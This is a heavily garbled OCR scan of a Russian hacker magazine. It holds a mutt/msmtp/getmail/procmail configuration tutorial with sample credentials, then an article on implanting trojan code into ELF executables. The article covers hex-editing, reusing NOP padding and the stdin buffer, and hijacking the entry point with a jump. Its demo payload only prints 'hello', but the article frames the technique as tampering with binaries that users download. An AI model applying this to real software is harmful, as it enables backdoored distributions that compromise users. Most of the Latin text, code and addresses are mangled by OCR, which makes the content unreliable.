# не помечать непрочитанные письма как прочитанные после выхода 
ипзеі тагк_осІ 

# позволяет суспендить тиК в шелле стандартным сочетанием Ш А 2 
зеі зизрепсі 

# не пищать ;) 
ипзеі Ьеер 

# не спрашивать про поле СС при написании письма 
зеі азксс=по 

# подпись выводится как результат скрипта 
зеі 5ідпаІиге="~/.тии/5сгірІ5/зідпаІигеІ" 

# просматривать письма встроенным пейджером; можно указать ко- 
манды Іеззітоге 

зеі радег=ЬШШп 

# не показывать следующее письмо после текущего 
зеі радег_зІор 

# мы берем версию агента из самопальных заголовков 
зеі изег_адепІ=по 

# если ты собрал тиК с патчем поддержки ІМІМТР, то для чтения но- 
востей потребуются следующие опции: 

зеі пе\л/з_сасІіе_с1іг="~/МаіІсІіг/ппф" 
зеі пеѵѵ5_зегѵег="ту.пеѵѵ5.5егѵег" 
зеі пе\А/5гс="~/.тиН/пе\А/5.тии" 
зеі саіісіп и р_пе\л/зд гои р=азк-уез 
зеі ппф_сопІехІ=2000 
зеі ппф_Іоас1_с1е5сгірІіоп=уе5 

# если сервер требует авторизации 
#зеІ ппф_изег="" 

#зеІ ппф_раз5="" 

зеі ппф_роІІ=60 

зеі ппф_гесоппесЬазк-уе5 

# далее идет, пожалуй, самый важный параметр. По умолчанию тиф 
как классический юниксовый почтовый клиент, хочет использовать 
локальный почтовый сервер, зепбтаМ. Но у нас нет такового на рабо- 
чей машине, и мы используем тзтф. 

зеі зепсІтаікѴизг/ІосаІ/Ьіп/тзтф" 

# следующие опции понадобятся для поддержки Маіісііг: 
зеі тЬох_Іуре="МаіІсІіг" 

зеі зрооІІіІе=~/МаіІсІіг/сІеІаиІІ 
зеі тЬох=~/МаіІс!іг/сІеІаиІІ 

# здесь складывается отложенная почта 
зеі розфопеб=~/МаіІсІіг/ро5фопесІ 

# а здесь отправленная 
зеі гесогсІ=~/МаіІс1іг/5епІ 

# помимо цветовых схем, тиК позволяет гибко настраивать вывод 
информации о ящиках на тулбар. Описание несложного синтаксиса 
можно найти в официальной документации, но и так ясно, что %сІ оз- 
начает количество удаленных писем, а %п — новых, и т.д. 

зеі 5ІаІиз_ІогтаІ="%ѵ [%Ц [%т тздз (%І), %п пеѵѵ, %р ипзепі, %сІ 
беіеіеф" 

зеі ІоІбег_ІогтаІ= м %І\І %Р %2І %-8.8и %-8.8д %8з %с! %Г 

зеі іпсІех_Тогта1:="%ЗС %2 %{%Ь %сІ} %-20.20І_ (%?1?%41&%4с?) %з" 

Еще раз повторюсь, что здесь отмечены не все опции. Так, например, 
полностью опущена работа со списками рассылки. На диске ты найдешь 
ПОЛНЫЙ комплект моих рабочих конфигов, проверенных и оттачивае- 
мых годами, со всеми комментариями. Актуальную версию конфигов 
(все-таки я время от времени что-нибудь исправляю) можно взять с 
ѵѵѵѵѵѵ.іоха^озі.ги/ргоіесіз.МтІ. 

[получаем и отправляем] Читать почту мы уже умеем, а вот отп- 
равлять и получать — пока еще нет. Настройка тзтір не займет много 
времени. Его конфигурационный файл поделен на секции, каждая из 
которых начинается с директивы ассоипі <название_аккаунта>. По 
умолчанию тзтір ищет аккаунт с названием беіаиіі, но можно указать 
любую другую учетную запись с помощью аргумента '-а 1 . Таким обра- 
зом, переключение почтовых серверов, через которые будет отправ- 



ляться почта, в связке тиЛ+тзгтЛр будет осуществляться с помощью 
хоткея (см. ЬіпсІіпдз.тиЛ), устанавливающего переменную зепсітаіі в 
значение вида тзггЛр -а ассоипі. 

$ ѵі -/.тзтіргс 

# минимальная настройка включает в себя имя аккаунта, имя хоста и 
поле Ігот 

ассоипі беіаиіі 
ІіозІ ІохаііозІ.ги 
Ігот Іоха@ІохаІюзІ.ги 

# если же требуется ЗМТР-авторизация или доступ по ИЗ — 
нет проблем 

ассоипі ІохаііозІ-аиІІі-ІІз 
ІіозІ ІохаііозІ.ги 
аиііі Іодіп 
изег Іоха 

раззшгсі тусооіразз 
Из 

ІІз.позІагІІІз 
ІІз_посегІсііеск 
Ігот Іоха@ІохаііозІ.ги 

За получение почты отвечает деітаіі. Ее конфигурационные файлы рас- 
полагаются в каталоге -/.деітаіі и имеют формат «один файл — один ак- 
каунт». (Зеітаіі умеет доставлять почту как по ріаіп РОРЗ/ІМАР, так и по 
РОРЗЗ/ІМАРЗ (РОРЗ/ІМАР оѵег ЗЗІ_), достаточно указать соответствую- 
щий тип доставки. Типичный конфиг состоит из трех частей: общих оп- 
ций (орііопз), опций протокола (геігіеѵег) и опций доставки (сіезііпаііоп). 

$ ѵі ~. деітаіі/деітаіігс 

# здесь мы указываем общие опции, выставляемые 
для данного аккаунта 

[орііопз] 

# включаем подробное журналирование действий 
ѵегЬозе = 1 

# указываем получать все сообщения с РОРЗ-сервера, 
в том числе и прочитанные 

геабаІІ = уез 

# удалять после получения 
беіеіе = уез 

# протоколировать процесс 
теззаде_Іод = /ѵаг/Іод/де!таіІ.Іод 
ІітеоиІ = 360 
тах_теззаде_5І2е = 0 

# самая главная часть — протокол, логин, пароль 
[геігіеѵег] 

Іуре = ЗітрІеРОРЗРеІгіеѵег 
зегѵег = ІохаііозІ.ги 
изегпате = Іоха 
раззшгсі = тусооіразз 

# а здесь мы указываем, как будет осуществляться обработка почты 
[сіезііпаііоп] 

# вместо того чтобы сразу класть почту в ящик, мы отдаем ее на об- 
работку внешней программе 

Іуре = ІѴЮА_ехІегпаІ 

# а именно — ргостаіі 
раііі = /изг/ІосаІ/Ьіп/ргостаіІ 

Если вместо незащищенного плайнтекстового РОРЗ используется 
РОРЗ-оѵег-ЗЗІ_, и демон принимает такие соединения на порту 995, на- 
до всего лишь изменить секцию геігіеѵег на следующую: 

[геігіеѵег] 

Іуре = ЗітрІеРОРЗЗЗІ-ВеІгіеѵег 

зегѵег = ІохаііозІ.ги 

рогі = 995 

изегпате = Іоха 

раззшгсі = тусооіразз 

В сведениях о доставке мы указали, что вся почта будет отдаваться на об- 
работку ргостаіі, который и займется сортировкой писем по папкам. Это 
очень удобно, когда ты подписан на несколько списков рассылки, или 



просто хочешь раскладывать письма по разным папкам в зависимости от 
отправителя. Синтаксис конфигурационного файла ргостаіі выполнен в 
традиционном наркоманском стиле ;), характерным для оІбзсГюоІ-прог- 
рамм. Вкратце, после объявления переменных каждая запись имеет вид 
«действие до — условие — действие после», где «действие до» может 
быть перенаправлением другой программе, переписыванием полей пись- 
ма и т.д., «условие» — регексп, по которому выполняется «действие пос- 
ле» — перемещение письма в заданную папку, вызов внешней програм- 
мы и прочее. Синтаксис записей ужасен, но именно благодаря своим воз- 
можностям делать с почтой все, что душе угодно, ргостаіі и по сей день 
остается самым мощным средством фильтрации сообщений. 

$ ѵі -/.ргостаіігс 

МАІЮІВ=$НОМЕ/МаіІсІіг/ 

Ю6РИЕ=$НОМЕ/.ргостаіІІод 

І_06АВЗТВАСТ=по 

ѴЕВВОЗЕ=по 

0В0РРВІѴЗ=уез 

РОВМАІІ=/изг/ІосаІ/Ьіп/ІогтаіІ 

# прежде всего, вызываем проверку ВСЕХ писем на спам с помощью 
ЗратАззаззіп. Об этом чуть позже. 

:01ѵѵ: зратаззаззіп.Іоск 
I /изг/ІосаІ/Ьіп/зратс 

# письма, помеченные как спам, уходят в трэш 
: 0 : 

# л Х-Зрат-ЗІаІиз: Уез 
$МАІЮІВ/іипк/ 

# іііті-письма тоже уходят в трэш 
:0 

# л СопІепІ-Туре:.*ііІтІ 
$МАІЮІВ/іипк/ 

# письма из списка рассылки ІгееЬзсІ перемещаются в отведенную 
для них папку 

:0 

# Л І_ізІ-Іс1:.*ІгееЬ5СІ 
$МАІЮІВ/ІгееЬзсІ-ІІ5І5/ 

# системные сообщения от рута уходят в специальную папку, чтобы 
не забивать мусором основной ящик 

:0 

# Л (РВОМІТО):.*гооІ@* „ 

$МАІЮІВ/ІохаІі05І/ 2 

# все остальное сыпется в основной ящик по умолчанию 
:0 

# * 

$МАІЮІВ/сІеІаиІІ/ 

Пару слов о спаме. Самым первым вызовом ргостаіі была проверка пи- 
сем на спам. В принципе, для этого достаточно просто установить 
ЗратАззаззіп, так как утилита зратс, входящая в его комплект, позво- 
ляет проверять письма автономно, без запуска сервера СпамАссассина, 
зратсі. Но при запущенном сервере проверка идет гораздо быстрее. 

# есііо зратс!_епаЫе="УЕЗ" » /еіс/гс.сопі 

# /изг/іосаі/еіс/гс.сі/за-зратсі зіагі 

[финальный штрих] Вот и все. Последний штрих — создание файла 
-/.таіісар, в котором будут прописаны соответствия вызываемых прог- 
рамм различным МІМЕ-типам. Так, кто сказал, что тиіі не умеет читать 
вложенные бос-файлы? 

$ есііо "арріісаііоп/тзшгсі; апіішгб -т коі8-г.Іх! %з; соріоизоиіриі" 

» -/.таіісар 

Теперь при получении письма с аттачем МІМЕ-типа арріісаііоп/тзѵѵогсі 
(когда тебе во вложении пришлют бос-файл) тиіі вызовет программу о 
апііѵѵогсі, которая удобно представит тебе содержимое бос-файла в ^ 

текстовом виде. По аналогии можно сопоставить другие программы ч- 

различным МІМЕ-типам. На диске ты найдешь полные варианты всех о. 
упомянутых сегодня конфигов, в том числе и «боевой» таіісар. Просто ^ 
поставь из пакетов/портов недостающие утилиты и — готово © 



аюхіічп 



ЮНИТЫ КРЕАТИФФ ^ ВЗЛОМ 




Внедрение троянов 
в ЕІ_Р-файлы 

[введение] Ворвавшись в нашу жизнь, І_іпих 
прочно обосновался на операционной арене, и 
все чаще и чаще на компакт-дисках гламур- 
ных журналов оказываются программы для 
этой оси. Причем, в отличие от ѴѴіпсІоѵѵз, боль- 
шинство линуксовых приложений не требует 
установки и спокойно копируется с одного 
компьютера на другой, что способствует ин- 
тенсивному обмену файлами. Помнишь М8- 
008? Какие там дистрибутивы! Наше поколе- 
ние таких слов тогда вообще не знало! 
Считается, будто бы обмен исполняемыми 
файлами в мире І_іпих намного ниже, чем в 
ѴѴіпсІоѵѵз, что большинство пользователей ка- 



чает исходники и компилирует их самостоя- 
тельно. Да как бы не так! Исходники занимают 
намного больше места, а модем не резиновый 
- это раз. Далеко не всегда сборка проходит 
гладко, и тогда приходится колдовать над ком- 
пилятором и исправлять ошибки разработчи- 
ков, что требует квалификации - это два. Нако- 
нец, компиляция больших проектов занимает 
довольно продолжительное время, зачастую 
намного превышающее время скачки (десятки 
минут или даже часы) - это три. Есть и другие 
причины, которые мы не будем здесь перечис- 
лять. Важно одно - очень многие пользователи 
предпочитают сливать готовые бинарники, 
скомпилированные для своей оси. Часто такие 
файлы лежат прямо на официальном сайте 
производителя. Часто, но не всегда! 



Есть и другая проблема. Линуховые прог- 
раммисты не заморачиваются с интерактив- 
ными конфигураторами и серьезно злоупот- 
ребляют «дефайнами» - директивами услов- 
ной компиляции. Например, для однопроцес- 
сорной машины создается одна сборка, для 
двух- или четырехпроцессорной - другая. Та- 
ких опций может быть очень много и выло- 
жить все разновидности сборок на офици- 
альный сайт просто нереально. А компили- 
ровать самостоятельно - лень. Вот и прихо- 
дится рыскать по Сети в поисках готовых 
сборок, откомпилированных независимыми 
разработчиками, и качать их. При этом воз- 
никает естественная угроза нарваться на ви- 
рус, закладку или троян, и такие происшест- 
вия уже случались! 







Доработать исходные тексты проще всего, но 
что делать, если есть только исполняемый 
файл и больше ничего? Берем Нех-редактор и в 
самых ответственных местах правим уез на по - 
пускай юзеры потом удивляются! А еще круче 
внедрить «часовой механизм», который в опре- 
деленный момент выведет приветственное со- 
общение на экран или выполнит некоторое со- 
бытие. Вот об этом мы сейчас и поговорим. 

[анатомия эльфов и их репродуктив- 
ные возможности] Изначально *піх под- 
держивали множество исполняемых форма- 
тов, ожесточенно конкурирующих между 
собой, но теперь поле боя опустело, и среди 
дымящихся обломков минувших сражений 
остался один ЕІ_Р, ставший стандартом 



де-факто для Ыпих 
и ВЗО. Кое-где еще 
встречается древний 
а.оій, но на него можно 
не обращать особого 
внимания. 

Аббревиатура ЕІ_Р 
расшифровывается 

как Ехесиііоп & ЫпкаЫе Рогтаі (Формат Ис- 
полнения и Компоновки). Он состоит в опре- 
деленном родстве с ѵѵіп32 РЕ, поэтому у них 
много общего. В начале ЕІ_Р-файла располо- 
жен служебный заголовок (ЕІ_Р-ПеасІег), опи- 
сывающий основные характеристики файла 
- тип (исполнения или линковки), архитекту- 
ра ЦП, виртуальный адрес точки входа, раз- 
меры и смещения остальных заголовков. 



структура ЕІ_Р-формат с точки зрения линкера (слева) 
и системного загрузчика ОС (справа) 



За ЕІ-Р-ПеасІег'ом следует таблица сегментов 
(ргодгат Иеасіег ІаЫе), перечисляющая имею- 
щиеся сегменты и их атрибуты. В формате 
линковки она необязательна. Линкер не обра- 
щает внимания на сегменты, так как работает 
исключительно на уровне секций. Напротив, 
системный загрузчик, загружающий исполня- 
емый ЕІ_Р-файл в память, игнорирует секции 
и оперирует целыми сегментами. 



[ХАКЕР 11 [83] 05 > 





[хакер 11 [83] 05 > ІІЫІХОЮ 108 ] 



ѴІПТУАІ- АРВЕЗЗ АІ_І_ОСАТІОМ 




карта памяти 
загруженного 
образа 

исполняемого 

файла 



Сегменты и секции - что это 
такое? Сегмент — это неп- 
рерывная область адресного 
пространства со своими ат- 
рибутами доступа. В част- 
ности, сегмент кода имеет 
атрибут исполнения, а сег- 
мент данных — атрибуты 
чтения и записи. Не стоит 
путать ЕІ_Р-сегменты с сег- 
ментами х86 процессора! В 
защищенном режиме 386+ 
никаких «сегментов» в изна- 
чальном смысле этого слова 
уже нет, а есть только селек- 
торы, и все сегменты ЕІ_Р- 
файла загружаются в еди- 
ный 4-х Гбайтовый х86-сег- 
мент! В зависимости от типа 
сегмента величина выравни- 
вания в памяти может варьи- 
роваться от 4Гі до ІОООГі байт 
(размер страницы на х86). 

В самом ЕІ_Р-файле они хра- 
нятся в невыровненном ви- 
де, плотно прижатые друг 
к другу. Так что со свобод- 
ным пространством для внед- 
рения — сплошные напряги. 

Ближайший аналог ЕІ_Р-сег- 
ментов — РЕ-секции, но в 
РЕ-файлах секция — это наименьшая струк- 
турная единица, а вот в ЕІ_Р-файлах сегмент 
может быть разбит на один или несколько 
фрагментов — секций. В частности, типичный 
кодовый сегмент состоит из секций .іпіі (про- 
цедуры инициализации), .ріі (секция связок), 
Дехі (основой код программы) и ііпіі (проце- 
дуры финализации). Секции нужны линкеру 
для комбинирования, чтобы он мог отобрать 
секции с похожими атрибутами и оптималь- 
ным образом растасовать их по сегментам 
при сборке файла, то есть «скомбинировать». 
Несмотря на то, что системный загрузчик игно- 
рирует таблицу секций, линкер все-таки поме- 
щает ее копию в исполняемый файл. Место 
тратится совсем немного, зато отладчикам и 
дизассемблерам так приятнее. По не совсем 
понятным причинам дсІЬ и многие другие прог- 
раммы отказываются загружать файл с пов- 
режденной или отсутствующей таблицей сек- 
ций, чем часто пользуются для защиты прог- 
рамм от постороннего вмешательства. 
Структуру и назначение полей служебных заго- 
ловков здесь разбирать не будем. Этим займется 
Гіех-редактор, и нам эти подробности не понадо- 
бятся. Интересующиеся могут обратиться к файлу 
/изг/іпсЫе/еІІ.Іп — там все подробно расписано. 



Лучше сосредоточимся на загрузке файла в па- 
мять. По умолчанию ЕІ_Р-заголовок находится 
по адресу 8048000И. Это и есть базовый адрес 
загрузки. На стадии линковки он может быть 
свободно изменен на другой, но большинство 
программистов оставляют его «как есть». Все 
сегменты проецируются в память в соответ- 
ствии с виртуальными адресами, прописанными 
в таблице сегментов, причем виртуальная про- 
екция образа всегда непрерывна, и между сег- 
ментами не должно быть незаполненных «дыр». 
Начиная с адреса 40000000И, располагаются сов- 
местно используемые библиотеки ІсІ-Ііпіх.зо, 
ІіЬт.50, ІіЬс.зо и другие, которые связывают опе- 
рационную систему с прикладной программой. 
Ближайший аналог из мира ѴѴіпсІоѵѵз — КЕВ- 
І\ІЕІ_32.ЭЦ_, реализующая ѵѵіп32 АРІ, но при жела- 
нии программа может вызывать функции опера- 
ционной системы и напрямую. В І\ІТ за это отвеча- 
ет прерывание ІЫТ 2ЕН, в І_іпих, как правило, ІЫТ 
80Н (подробнее о различии в реализации систем- 
ных вызовов можно прочитать в документе ІІІМІХ 
АззетЫу Сосіез Оеѵеіортепі Іог ѴиІпегаЬіІШез 
ІІІизІгайоп Ригрозез или книге Зубкова «Ассемб- 
лер — язык неограниченных возможностей»). 

Для вызова функций типа открытия файла мож- 
но обратиться либо к библиотеке ІіЬс, либо непос- } 



редственно к самой операцион- 
ной системе. Первый вариант — 
самый громоздкий, самый пере- 
носимый и наименее приметный. 
Последний — прост в реализа- 
ции, но при первом же взгляде 
на дизассемблерный листинг тут 
же бросается в глаза (правиль- 
ные программы ІЫТ 80Гі не вызы- 
вают!), к тому же он испытывает 
проблемы совместимости с раз- 
личными версиями І_іпих. Вот 
она — расплата за простоту! 
Последний гигабайт адресного 
пространства (от адреса 
СОООООООГі и выше) занимают 
код и данные операционной сис- 
темы, к которым мы будем обра- 
щаться только посредством пре- 
рывания ІЫТ 80Гі или через раз- 
деляемые библиотеки. 

Стек находится в нижних адре- 
сах. Он начинается с базового 
адреса загрузки и «растет 
вверх» по направлению к нуле- 
вым адресам. В большинстве 
линуксов стек исполняем (то 
есть сюда можно скопировать 
машинный код и передать на 
него управление), однако неко- 
торые параноидальные адми- 
нистраторы устанавливают заплатки, отнимаю- 
щие у стека атрибут исполняемости, но боль- 
шой распространенности они не получили, и 
ими можно пренебречь. 

[имплантация чужеродного кода в ЕІ_Р- 
файл] Для экспериментов по имплантации нам 
потребуется живой исполняемый файл, который 
при помощи компилятора и текстового редакто- 
ра мы сможем изготовить и самостоятельно. 
Нажмем <ЗГііТС-Р4> в МібпідГіІ Соттапсіег'е, на- 
берем программу следующего содержания (см. 
листинг), затем <Р2>/"имя-файла.с" и откомпи- 
лируем ее своим любимым дсс с настройками 
по умолчанию (дсс имя-файла.с -о имя-файла). 

[демонстрационная программа, 
в которую мы будем внедрять посторонний код] 

#іпсІисІе <зіс1іо.іі> 

таіп() 

{ 

ргіпІІ("І_ОРЮІ - Ше ЬезІ дгоир іп Ше ѵѵогісі!\п"\ 
"(ѵѵ\А/\А/.Іогсіі.огд)\птоп5Іег5, Ьопбаде апб 
засІо-тазоѴГ); 



ЧТО НАМ ПОНАДОБИТСЯ? 

Для правки исполняемых файлов Линух необязателен. Доста- можно бесплатно скачать с Ые.зІ.пеі. Он «переварива- 

точно иметь НІЕѴѴ, запущенный из-под ѴѴіпсІоѵѵз, или даже М3- ет» ЕІ_Р-формат, в нем есть мощный ассемблер и про- 

003 однако в этом случае придется сильно попыхтеть и к тому чие вкусности. Как вариант, можно воспользоваться 

же - как потом это отлаживать? Так что Линух все-таки желате- редактором ВІЕѴѴ фіеѵѵ.зілеі), но он намного слабее, 
лен, хотя бы в виде эмулятора - ѴМѴѴаге, ВОСНЗ или ОЕМІІ. Желательно иметь ИДУ. Линуховый порт содержит 

Мы остановимся на Мех-редакторе НТЕ, готовую сборку которого удобный интерактивный отладчик в стиле ТигЬо- 








Образовавшийся файл загрузим в Иех-редак- 
тор (./ГіМ).7.5-Ііпих-і386 имя-файла), а затем 
нажмем <Р6> (тосіе) и выберем еІІ/ітаде. Ре- 
дактор перейдет в режим отображения образа 
исполняемого файла, автоматически перенося 
нас в окрестности точки входа, отмеченной 
меткой епігуроіпі. Если этого не произойдет, 
нажмем <Р5> (доіо) и введем епігуроіпі (без ка- 
вычек). Экран должен выглядеть приблизи- 
тельно так: (см. рис.З) 

Давай для разминки просто поменяем пер- 
вые две команды местами: хог еЬр,еЬр/рор 
езі на рор езі/хог еЬр,еЬр. Подведем курсор к 
первой машинной команде (она расположе- 
на по адресу 80482С2И) и нажмем <ССгІ-А> 
(АззетЫе), вводим рор езі. Редактор пред- 
ложит несколько вариантов ассемблирова- 
ния на наш выбор: 5ЕГі и 8РН СбГі. Выбираем 
5ЕГі как самый короткий (8РП СбГі просто не 
влезет в отведенное место), затем точно так 
ассемблируем команду хог еЬр,еЬр. 
Измененные байты редактор выделяет крас- 
ным цветом, что наглядно и очень красиво, 
но при нажатии на <Р2> (заѵе) они вновь зе- 
ленеют, подтверждая, что все исправления 
успешно сохранены. Полей контрольной 
суммы в ЕІ_Р-заголовке нет, и потому забо- 
титься о ее пересчете не нужно. Линух конт- 
рольную сумму файла не считает! А не счи- 
тает он ее потому, что проектировался голо- 
вой. Это же не ѴѴіпбоѵѵз! Такое впечатление, 
что РЕ-файл проектировала толпа народу, с 
трудом взаимодействующая между собой. 
Суди сам: и Линух, и ѴѴіпбоѵѵз поддерживают 
механизм отложенной загрузки по требова- 
нию. Страницы образа проецируются в па- 
мять тогда и только тогда, когда к ним про- 



исходит обращение, 
в результате чего не- 
медленно после за- 
пуска файл готов к 
работе, а все недос- 
тающие страницы 
дозагружаются уже 
потом (или не загру- 
жаются вообще, нап- 
ример, часть прог- 
раммы, ответствен- 
ная за печать, вооб- 
ще не будет загруже- 
на, если ни разу не 
был выбран пункт 
ргіпі). Процесс заг- 
рузки как бы «разма- 
зывается» во време- 
ни, не нервируя ни- 
какими песочными 
часами, которые так 
любит демонстриро- 
вать ѴѴіпбоѵѵз. Но! 
Ведь при подсчете 
контрольной суммы 
происходит неизбеж- 
ное обращение ко 
всем страницам, и 
все они загружаются 
в память, даже если 
не нужны. Получается, что у нас есть два ме- 
ханизма — один оптимизирует загрузку, дру- 
гой ее «пессимизирует», съедая весь выиг- 
рыш. Где логика?! 

А вот разработчики Линуха переложили подс- 
чет контрольной суммы на устройства вво- 
да/вывода, которые ее действительно считают. 
Конечно, это не страхует от искажений. В част- 
ности, жесткие диски контролируют только фи- 
зические дефекты, но не обращают внимания 
на логические искажения (вирусы). Тем не ме- 
нее, особого смысла в контрольной сумме, хра- 
нящейся непосредственно в самой файле, все 
равно нет. Если вирус может модифицировать 
файл, он модифицирует и контрольную сумму. 
Контрольные суммы нужно хранить в отдель- 
ном «защищенном хранилище», и их подсче- 
том должна заниматься файловая система или 
антивирусные ревизоры. Ни того, ни другого в 
мире Линуха не наблюдается. Хотя они как бы 
есть, но ни у кого реально не установлены. 
Единственную проблему представляют протек- 
торы и упаковщики исполняемых файлов, конт- 
ролирующие собственную целостность. С каж- 
дым годом их становится все больше и больше. 
ІІРХ, протектор от зГііѵ'ы... В них на первых по- 
рах лучше не внедряться! 

Но мы отвлеклись. Выходим из Иех-редактора, на- 
жав <Р10>, и запускаем пропатченный файл. Он 
запускается, подтверждая свою работоспособ- 
ность. Значит, модификация прошла успешно! 

А теперь займемся более серьезными ве- 
щами, попытавшись внедрить в программу 
реальный код, который делает что-то по- 
лезное. Сразу возникает вопрос: куда мы 
будем внедряться? Между сегментами сво- 
бодного места нет, между секциями тоже. 




Можно (теоретически) расширить послед- 
ний сегмент и внедриться сюда, но, во-пер- 
вых, это будет слишком заметно, а во-вто- 
рых, довольно сложно. 

Но все не так плохо, как кажется! По умолча- 
нию дсс выравнивает стартовые адреса функ- 
ций по границе ІОГі, а это значит, что даже наш 
демонстрационный файл содержит просто кучу 
свободного пространства. В среднем 10 Гі/2Гі = 
8Гі байт на каждую функцию, включая служеб- 
ные. Сюда и мамонта упрятать можно, если, ко- 
нечно, его предварительно расчленить. 

[цепочка команд І\І0Р, оставленная компилято- 
ром в конце функции таіп для выравнивания] 



! таіп: 

! ризЬеЬр 



;хгеТ о80482с17 



8048385 ! тоѵ еЬр, езр 

8048387 ! зиЬ езр, 8 

804838а! апсі езр, (ШШОЬ 

804838сі ! тоѵ еах, 0 

8048392 ! зиЬ езр, еах 

8048394 ! тоѵ йтгй ріг [езр], 

зіі7_і_ 0РЮІ Фе_ЬезІ_дгоир_іп_Фе_80484е0 

8048395 ! саІІ маррег_8049634_80482Ь0 

80483а0 ! Іеаѵе 

80483а1 ! геі 

80483а2 пор 



80483ас пор 



А вот еще одна лазейка — буфер ввода/выво- 
да, расположенный в сегменте данных, дамп 
которого приведен ниже. Это целых 28 байт, 
которые можно использовать по своему усмот- 
рению! Даже если никаких явных файловых 
манипуляторов в файле нет (как, например, в 
нашей демонстрационной программе), такой 
буфер все равно создается при компиляции 
программы, что наш случай и подтверждает. 

[ЗТОІІМ-буфер, расположенный в сегменте 
данных] 

80484с2 сіЬ 00Ь 

80484сЗ СІЬ 00Ь 

80484С4 

_Ю_зІсІіп_и5ес1: 

ЬЬ 01 И 
80484С5 йЬ 00Ь 

80484С6 ЬЬ 02Ь 



80484сіе ЬЬ 00Ь 



О 

о 



йеЬиддег'а, плюс сам дизассемблер. Если нет ИДЫ, 
возьми дбЬ - стандартный отладчик, входящий в штат- 
ный комплект поставки большинства Линухов, но его 
возможности сильно ограничены. В частности, он отка- 
зывается грузить файлы без зесЬоп ІаЫе, спотыкается 
на антиотладочный приемах и т.д. Из документации 



нам, в первую очередь, понадобится спецификация на ЕІ_Р- 
формат, которую можно бесплатно скачать с 
и/и/и/. сз .ргіпсеіоп . еби/соигзез/агсІпіѵе/іаІІ05/созЗ 1 8/6осз/ЕІЕ_Еог 
таі.рсН и перечень системных вызовов в разных осях - ІІІЧІХ 
АззетЫу Сосіез ОеѵеІортепІ Тог ѴиІпегаЬіІіЬез ІІІизігаЬоп 
Ригрозез {уѵт /ѵ.Ы-рІ.пеі/сІоситепІз/азтсосІез- 1.0.2.рсІГ). 



аюхіічп 
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результат работы модифицированного файла 
после перестановки пары команд местами - 
полет нормальный 



Остается решить, как передать управление на 
внедренный код. Это можно сделать различ- 
ными путями: скорректировать точку входа 
(НТЕ это умеет) или внедрить в ее окрестнос- 
ти специальный ітр. Вот так мы и поступим! 
Запускаем редактор, переходим в точку входа 
и смотрим на нее очень внимательно: 

[точка входа и ее окрестности] 

! епігуроіпі: 

! рор езі 



80482СІ ! 


хог 


ебр, ебр 


80482сЗ ! 


тоѵ 


есх, езр 


80482С5 ! 


апб 


езр, 0ШШШ6 


80482С8 ! 


ризб 


еах 


80482С9 ! 


ризб 


езр 


80482са ! 


ризб 


ебх 


80482С6 ! 


ризб 


Іі6с_сзи_1іпі 


8048260 ! 


ризб 


_М6с_сзи_іпіІ 


8048265 ! 


ризб 


есх 


8048266 ! 


ризб 


езі 


8048267 ! 


ризб 


таіп 


804826с ! 


саіі 





\л/гаррег_8049630_80482а0 
80482е1 ! № 

80482е2 ! пор 

Почему бы нам не заменить рор езі/хог еЬр,еЬр на 
«Ітр на наш код», откуда мы сможем сделать все, 
что задумано, выполнить эти команды и вернуться 
обратно? Но для начала необходимо подготовить 



код, который мы будем внедрять. Для простоты 
выведем короткое приветствие на экран. На язы- 
ке ассемблера это звучит приблизительно так: 

[исходная программа, 
выводящая приветствие на экран] 

тоѵ еах, 4 ; системный вызов мііе 
тоѵ еЬх,1 ; идентификатор стандартного вывода 
тоѵ есх, оТТзеІ Ьедіп_тзд ; указатель на пер- 
вый символ выводимого сообщения 
тоѵ ебх, оіізеі еп6_тзд ; указатель на пос- 
ледний символ выводимого сообщения 
іпі 806 ; вывод на экран 
рор езі ; сохраненные команды 
хог еЬх,еЬр 

Ітр 80482С36 ; возврат в программу 

Это не самый оптимальный вариант, и его можно 
здорово оптимизировать, если переписать так: 

[оптимизированный вариант] 

хог еах, еах 
асісі аі, 4 
хог еЬх,еЬх 
іпс еЬх 

тоѵ есх, оіізеі Ьедіп_тзд 

тоѵ ебх, есх 

асісі ебх, зі 2 еоТ(тзд) 

іт 806 

рор езі 

хог еЬр, еЬр 

Ітр 80482С36 

Теперь прокручивая файл в Нех-редакторе, 
найдем и выпишем стартовые адреса всех це- 
почек ГЧОР'ов, пригодных для внедрения. А ка- 
кие цепочки пригодны для внедрения? Если две 
соседние цепочки расположены в пределах до- 
сягаемости короткого перехода (грубо — в пре- 
делах сотни байт), Зх ГЧОР'ов будет вполне дос- 
таточно (2 байта на команду перехода, один — 
на любую однобайтовую команду полезного ко- 
да, например, іпс еЬх или рор езі). В противном 
случае нам необходимо иметь цепочку, по край- 
ней мере, из шести ІМОР'ов: пять на команду 
близкого перехода и один — на полезную ко- 
манду. В нашем случае получается: 
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результат работы программы после внедрения 



80483066 10 байт 
80483а2 14 байт 

8048464 12 байт 



Итого — 36 байт. Вполне достойное место для 
демонстрационной программы! Начинаем за- 
полнять цепочки ІМОР'ов полезным кодом. 
С первой попытки у нас получается: 

8048306 31 с0 хог еах, еах 

8048308 04 04 асісі аі, 4 

804830а е9 93 00 00 00 ітр 80483а2б 

804830190 пор 



При этом один последний ЫОР останется поте- 
рян, но по-другому не получается. Команда хог 
еЬх,еЬх занимает два байта и сюда не помеща- 
ется. А что если переставить команды места- 
ми? Перенести асісі аІ,4 в следующую цепочку 
ЫОР, а вместо нее вставить хог еЬх,еЬх/іпс еЬх: 



8048306 31 с0 хог 
8048308 3166 хог 
804830а 43 іпс 
8048306 е9 92 00 00 00 



еах, еах 
еЬх, еЬх 
еЬх 

Ітр 80483а2б 



Тогда следующая цепочка будет заполнена так: 



80483а2 0404 асісі 
80483а4 69 ?? ?? ?? ?? 
оіізеі 6едіп_тзд 
80483а9 89са тоѵ 
80483а6 е9 64 00 00 00 



аі, 4 

тоѵ есх, 

ебх, есх 
Ітр 80484646 



В третью, последнюю, цепочку ІЧОР'ов остаток 
кода уже не идет: не хватает одного единственно- 
го байта! Что ж, попытаемся еще немного ужать 
наш код. Например, вместо пары инструкций тоѵ 
ебх,есх/асІсІ есІх,зі 2 еоІ(тзд), которые занимают 5 
байт, можно использовать Іеа есІх,[есх+зі 2 еоІ 
(тзд)]. Тогда все влезает! Ну а само сообщение 
можно разместить в сегменте данных. Поскольку 
свободного места там не очень много, ограни- 
чимся строкой ГіеІІо. Завершающий нуль в конце 
ставить необязательно, поскольку системный вы- 
зов ѵѵгііе выводит ровно столько символов, сколь- 
ко ему приказано вывести, и ни на какие знаки 
«останова» не реагирует. 

Если все было сделано правильно (что маловеро- 
ятно, в первый раз ошибки делают все), наш файл 
победоносно выведет строку ГіеІІо, а следом за 
